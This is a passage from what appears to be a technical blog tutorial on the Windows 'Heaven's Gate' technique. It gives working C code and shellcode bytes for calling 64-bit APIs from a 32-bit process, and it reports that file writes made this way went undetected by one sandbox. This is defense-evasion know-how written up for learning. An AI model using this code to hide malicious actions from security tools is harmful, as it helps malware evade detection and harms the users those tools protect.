    uint64_t* args = (uint64_t*)(&argc + 1);
    uint64_t ret = 0;
    static uint8_t code[] = {
        /*  [bits 32]
            push ebx
            mov ebx, esp
            and esp, 0xFFFFFFF8

            push 0x33
            push _next_x64_code
            retf
        */
        0x53, 0x89, 0xE3, 0x83, 0xE4, 0xF8,
        0x6A, 0x33, 0x68, 0x78, 0x56, 0x34, 0x12, 0xCB,
        /*  [bits 64]
            push rsi
            push rdi

            mov rsi, args
            mov rcx, [rsi]
            mov rdx, [rsi+8]
            mov r8, [rsi+16]
            mov r9, [rsi+24]

            mov rax, argc
            args_start:
                cmp rax, 4
                jle args_end
                mov rdi, [rsi+8*rax-8]
                push rdi
                dec rax
                jmp args_start
            args_end:

            mov rax, proc
            sub rsp, 32
            call rax

            mov rdi, &ret
            mov [rdi], rax

            pop rdi
            pop rsi
        */
        0x56, 0x57,
        0x48, 0xBE, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x8B, 0xE, 0x48, 0x8B, 0x56, 0x8, 0x4C, 0x8B, 0x46, 0x10, 0x4C, 0x8B, 0x4E, 0x18,
        0x48, 0xB8, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x83, 0xF8, 0x4, 0x7E, 0xB, 0x48, 0x8B, 0x7C, 0xC6, 0xF8, 0x57, 0x48, 0xFF, 0xC8, 0xEB, 0xEF,
        0x48, 0xB8, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x83, 0xEC, 0x20, 0xFF, 0xD0,
        0x48, 0xBF, 0x88, 0x77, 0x66, 0x55, 0x44, 0x33, 0x22, 0x11, 0x48, 0x89, 0x7,
        0x5F, 0x5E,
        /*  [bits 64]
            push 0x23
            push _next_x86_code
            retfq
        */
        0x6A, 0x23, 0x68, 0x78, 0x56, 0x34, 0x12, 0x48, 0xCB,
        /*  [bits 32]
            mov esp, ebx
            pop ebx
            ret
        */
        0x89, 0xDC, 0x5B,
        0xC3
    };

    static uint32_t ptr = 0;
    if (!ptr) {
        ptr = (uint32_t)VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        for (int i = 0; i < sizeof(code); i++) ((PBYTE)ptr)[i] = code[i];
    }
    *(uint32_t*)(ptr + 9) = ptr + 14;                       // _next_x64_code
    *(uint64_t*)(ptr + 18) = (uint64_t)(uintptr_t)args;     // zero-extend the 32-bit pointer
    *(uint64_t*)(ptr + 43) = (uint64_t)argc;
    *(uint64_t*)(ptr + 70) = proc;
    *(uint64_t*)(ptr + 86) = (uint64_t)(uintptr_t)&ret;
    *(uint32_t*)(ptr + 102) = ptr + 108;                    // _next_x86_code
    ((void(*)())ptr)();
    return ret;
}

MakeUTFStr

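Prototype:

char* MakeUTFStr(const char* str);

Builds a _UNICODE_STRING structure in the 64-bit layout (Buffer is an 8-byte pointer at offset 8) and returns a pointer to it. The implementation:

char* MakeUTFStr(const char* str) {
    uint32_t len = lstrlenA(str);
    // 16-byte header followed by the UTF-16 characters and a terminating 0
    char* out = (char*)malloc(16 + (len + 1) * 2);
    *(uint16_t*)(out) = (uint16_t)(len * 2); // Length, in bytes
    *(uint16_t*)(out + 2) = (uint16_t)((len + 1) * 2); // MaximumLength, in bytes

    // Widen each char to a 16-bit code unit (ASCII input assumed)
    uint16_t* outstr = (uint16_t*)(out + 16);
    for (uint32_t i = 0; i <= len; i++) outstr[i] = (unsigned char)str[i];
    *(uint64_t*)(out + 8) = (uint64_t)(uintptr_t)(out + 16); // Buffer
    return out;
}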
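For readers who want to check the layout away from Windows, here is a portable sketch of the same idea. It is a hypothetical variant, not the article's function: it zeroes the padding bytes, rejects strings whose byte length would not fit in the 16-bit fields, and takes the address at which 64-bit code will see the block as a parameter (block_addr), so that Buffer can be computed without pointer casts. It assumes ASCII input and a little-endian host.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

enum { US64_HEADER_BYTES = 16, US64_MAX_CHARS = 0x7FFE };

/* Build a 64-bit UNICODE_STRING followed by its characters in one block.
   Returns a calloc'd block (the caller frees it) or NULL on failure. */
static uint8_t *make_unicode_string64(const char *str, uint64_t block_addr) {
    size_t len = strlen(str);
    if (len > US64_MAX_CHARS) return NULL;  /* MaximumLength must fit in 16 bits */
    uint8_t *out = calloc(1, US64_HEADER_BYTES + (len + 1) * 2);
    if (!out) return NULL;
    uint16_t length = (uint16_t)(len * 2);
    uint16_t max_length = (uint16_t)((len + 1) * 2);
    uint64_t buffer = block_addr + US64_HEADER_BYTES;
    memcpy(out + 0, &length, sizeof length);          /* +0x00 Length */
    memcpy(out + 2, &max_length, sizeof max_length);  /* +0x02 MaximumLength */
    memcpy(out + 8, &buffer, sizeof buffer);          /* +0x08 Buffer */
    for (size_t i = 0; i <= len; i++) {               /* includes the terminator */
        uint16_t unit = (unsigned char)str[i];
        memcpy(out + US64_HEADER_BYTES + 2 * i, &unit, sizeof unit);
    }
    return out;
}

/* Read back a 16-bit field from a block built above. */
static uint16_t us64_field16(const uint8_t *us, size_t offset) {
    uint16_t v;
    memcpy(&v, us + offset, sizeof v);
    return v;
}

/* Demo: build a string, read one 16-bit header field, release the block. */
static uint16_t demo_field_of(const char *str, size_t offset) {
    uint8_t *us = make_unicode_string64(str, 0x10000);  /* made-up address */
    if (!us) return 0;
    uint16_t v = us64_field16(us, offset);
    free(us);
    return v;
}
```

For "kernel32.dll" (12 characters) the Length field is 24 bytes and MaximumLength is 26, matching what MakeUTFStr writes.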

GetKernel32

Declaration:

uint64_t GetKernel32();

Loads kernel32.dll together with kernelbase.dll.

The article Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching mentioned above describes this step in great detail. According to it, kernel32.dll is loaded at a fixed address on Windows and can only be loaded there. In that author's test environment, the region at the 64-bit kernel32.dll load address had already been allocated and mapped as private memory, so calling LdrLoadDll to load kernel32.dll failed with 0xC0000018 (STATUS_CONFLICTING_ADDRESSES).

Any attempts to load kernel32.dll using the LdrLoadDll function would result to the error code 0xC0000018 ( STATUS_CONFLICTING_ADDRESSES ). This is due to the fact that the default memory location of kernel32 is already mapped as private.

The fix is conceptually simple: call NtFreeVirtualMemory to release the region, then load the DLL again with LdrLoadDll. The code, however, is quite involved; see dadas190/Heavens-Gate-2.0 for an implementation.

On my system (Windows 10 x64 20H2), though, I could not find the allocation and mapping the author describes, and calling LdrLoadDll directly loads kernel32.dll without trouble. Perhaps the behavior was removed in some Windows release.

So the code for loading the 64-bit kernel32 becomes very simple:

uint64_t GetKernel32() {
    static uint64_t kernel32 = 0;
    if (kernel32) return kernel32;

    uint64_t ntdll = GetModuleHandle64(L"ntdll.dll");
    uint64_t LdrLoadDll = MyGetProcAddress(ntdll, "LdrLoadDll");
    char* str = MakeUTFStr("kernel32.dll");
    // Arguments: search path (none), flags (none), module name, out: module base
    X64Call(LdrLoadDll, 4, (uint64_t)0, (uint64_t)0, (uint64_t)str, (uint64_t)(&kernel32));
    free(str);
    return kernel32;
}
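GetKernel32 ignores the value that X64Call returns, which for LdrLoadDll is an NTSTATUS. Checking it makes failures such as 0xC0000018 or 0xC0000142 visible right away. The sketch below shows the usual success test (an NTSTATUS is a signed 32-bit value and non-negative values mean success) applied to a 64-bit rax value; the helper names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* NTSTATUS lives in the low 32 bits of rax; non-negative means success. */
static int nt_success_from_rax(uint64_t rax) {
    return (int32_t)(uint32_t)rax >= 0;
}

/* Top two bits: 0 = success, 1 = informational, 2 = warning, 3 = error. */
static unsigned nt_severity_from_rax(uint64_t rax) {
    return (unsigned)((uint32_t)rax >> 30);
}
```

With these, a caller could test the result of the X64Call to LdrLoadDll and bail out when nt_success_from_rax returns 0, instead of returning a kernel32 value of 0 without any explanation.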

GetProcAddress64

Prototype:

uint64_t GetProcAddress64(uint64_t hModule, const char* func);

Once we have the base address of the 64-bit kernel32, we can get function addresses through its GetProcAddress directly. The implementation:

uint64_t GetProcAddress64(uint64_t module, const char* func) {
    static uint64_t K32GetProcAddress = 0;
    // Resolve the 64-bit GetProcAddress once via the manual export-table walk
    if (!K32GetProcAddress) K32GetProcAddress = MyGetProcAddress(GetKernel32(), "GetProcAddress");

    return X64Call(K32GetProcAddress, 2, module, (uint64_t)func);
}

LoadLibrary64

Prototype:

uint64_t LoadLibrary64(const char* name);

Calls LoadLibraryA in the 64-bit kernel32 to load other DLLs, such as user32.dll.

The implementation:

uint64_t LoadLibrary64(const char* name) {
    static uint64_t LoadLibraryA = 0;
    // Resolve the 64-bit LoadLibraryA once and cache it
    if (!LoadLibraryA) LoadLibraryA = GetProcAddress64(GetKernel32(), "LoadLibraryA");

    return X64Call(LoadLibraryA, 1, (uint64_t)name);
}

MessageBox test

Let's try the classic of classics, a MessageBox popup:

void Test() {
    uint64_t kernel32 = GetKernel32();
    uint64_t user32 = LoadLibrary64("user32.dll");
    uint64_t MessageBox64 = GetProcAddress64(user32, "MessageBoxA");
    X64Call(MessageBox64, 4, (uint64_t)NULL, (uint64_t)"Wowowowowow", (uint64_t)"Wowowowowow", (uint64_t)NULL);
}

int main() {
    Test();
}

The result:

image-20211106145257165

0x02. Sandbox and Huorong Sword Tests

ThreatBook Cloud Sandbox (微步云沙箱) test

First, test a piece of ordinary file read/write code:

void TestNormal() {
    char path[MAX_PATH];
    char hacked[] = "Hacked by 34r7hm4n";
    HANDLE hFile;
    char buffer[100] = { 0 };
    DWORD transferred = 0; // receives the byte count; required when no OVERLAPPED is passed
    GetCurrentDirectoryA(MAX_PATH, path);
    lstrcatA(path, "\\test.txt");
    hFile = CreateFileA(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
    CloseHandle(hFile);
    hFile = CreateFileA(path, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    WriteFile(hFile, hacked, lstrlenA(hacked), &transferred, NULL);
    CloseHandle(hFile);
    hFile = CreateFileA(path, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    ReadFile(hFile, buffer, sizeof(buffer), &transferred, NULL);
    CloseHandle(hFile);
    printf("%s\n", buffer);
    system("pause");
}

The dropped file was detected:

image-20211106145521139

Now test code that does the same thing through Heaven's Gate:

void TestHeavensGate() {
    uint64_t kernel32 = GetKernel32();
    uint64_t user32 = LoadLibrary64("user32.dll");
    uint64_t CreateFile64 = GetProcAddress64(kernel32, "CreateFileA");
    uint64_t WriteFile64 = GetProcAddress64(kernel32, "WriteFile");
    uint64_t ReadFile64 = GetProcAddress64(kernel32, "ReadFile");
    uint64_t CloseHandle64 = GetProcAddress64(kernel32, "CloseHandle");
    char path[MAX_PATH];
    char hacked[] = "Hacked by 34r7hm4n";
    uint64_t hFile;
    char buffer[100] = { 0 };
    DWORD transferred = 0; // receives the byte count; required when no OVERLAPPED is passed

    GetCurrentDirectoryA(MAX_PATH, path);
    lstrcatA(path, "\\test.txt");
    hFile = X64Call(CreateFile64, 7, (uint64_t)path, (uint64_t)GENERIC_WRITE, (uint64_t)0, (uint64_t)NULL, (uint64_t)CREATE_NEW, (uint64_t)FILE_ATTRIBUTE_NORMAL, (uint64_t)NULL);
    X64Call(CloseHandle64, 1, hFile);
    hFile = X64Call(CreateFile64, 7, (uint64_t)path, (uint64_t)GENERIC_WRITE, (uint64_t)0, (uint64_t)NULL, (uint64_t)OPEN_EXISTING, (uint64_t)FILE_ATTRIBUTE_NORMAL, (uint64_t)NULL);
    X64Call(WriteFile64, 5, (uint64_t)hFile, (uint64_t)hacked, (uint64_t)lstrlenA(hacked), (uint64_t)&transferred, (uint64_t)NULL);
    X64Call(CloseHandle64, 1, hFile);
    hFile = X64Call(CreateFile64, 7, (uint64_t)path, (uint64_t)GENERIC_READ, (uint64_t)0, (uint64_t)NULL, (uint64_t)OPEN_EXISTING, (uint64_t)FILE_ATTRIBUTE_NORMAL, (uint64_t)NULL);
    X64Call(ReadFile64, 5, (uint64_t)hFile, (uint64_t)buffer, (uint64_t)sizeof(buffer), (uint64_t)&transferred, (uint64_t)NULL);
    X64Call(CloseHandle64, 1, hFile);
    printf("%s\n", buffer);
    system("pause");
}

No dropped file was detected:

image-20211106145630433

Maldun (魔盾) test

It simply crashed, which left me speechless:

image-20211106150139913

Huorong Sword (火绒剑) test

In the end it could not escape Huorong Sword:

image-20211106150000934

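0x03. Unexplained Bugs

There are still a few baffling bugs whose cause I have not figured out:

  1. The program only works when built and then launched by double-clicking. Running it from VS or from cmd makes loading kernel32.dll fail: LdrLoadDll("kernel32.dll") returns 0xC0000142 (STATUS_DLL_INIT_FAILED)
  2. user32.dll cannot be loaded from inside a DLL. At least in my environment, LoadLibrary64("user32.dll") crashes the whole program

Finally, I am still new to Windows internals and malware, so there are bound to be things I have misunderstood. If you spot any problems in this article, corrections are very welcome!

0x04. References

  1. Knockin’ on Heaven’s Gate – Dynamic Processor Mode Switching by george_nicolaou

  2. Mixing x86 with x64 code by ReWolf

  3. WoW64 internals by wbenny

  4. Heavens-Gate-2.0 by dadas190

  5. 天堂之门技术 (Heaven's Gate Technique) by Tardis

  6. Rebuild The Heaven’s Gate: from 32-bit Hell back to 64-bit Wonderland by Sheng-Hao Ma

  7. 通过PEB结构遍历进程模块 (Enumerating Process Modules via the PEB)

  8. PE基础2-导出表-导入表 (PE Basics 2: Export Table and Import Table)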